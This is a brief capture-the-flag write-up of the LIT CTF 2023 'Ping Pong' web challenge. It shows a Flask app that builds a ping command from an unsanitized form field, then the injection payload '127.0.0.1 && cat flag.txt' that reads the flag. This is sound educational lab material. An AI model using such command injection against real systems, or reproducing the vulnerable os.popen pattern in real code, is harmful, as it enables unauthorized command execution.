Post

LIT CTF 2023 - Ping Pong

Posted
By Nolliv22 1 min read

Description

Category: Web

I made this cool website where you can ping other websites!

pingpong.zip

Resolution

We got the souce code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

from flask import Flask, render_template, redirect, request
import os

app = Flask(__name__)

@app.route('/', methods = ['GET','POST'])
def index():
    output = None
    if request.method == 'POST':
        hostname = request.form['hostname']
        cmd = "ping -c 3 " + hostname
        output = os.popen(cmd).read()

    return render_template('index.html', output=output)

We can see that hostname variable is not sanitized so we can inject another command to print the flag: 127.0.0.1 && cat flag.txt.

Ping pong

We get the flag: LITCTF{I_sh0uld_b3_m0r3_c4r3ful}.

Writeups, LIT CTF 2023
Web
This post is licensed under CC BY 4.0 by the author.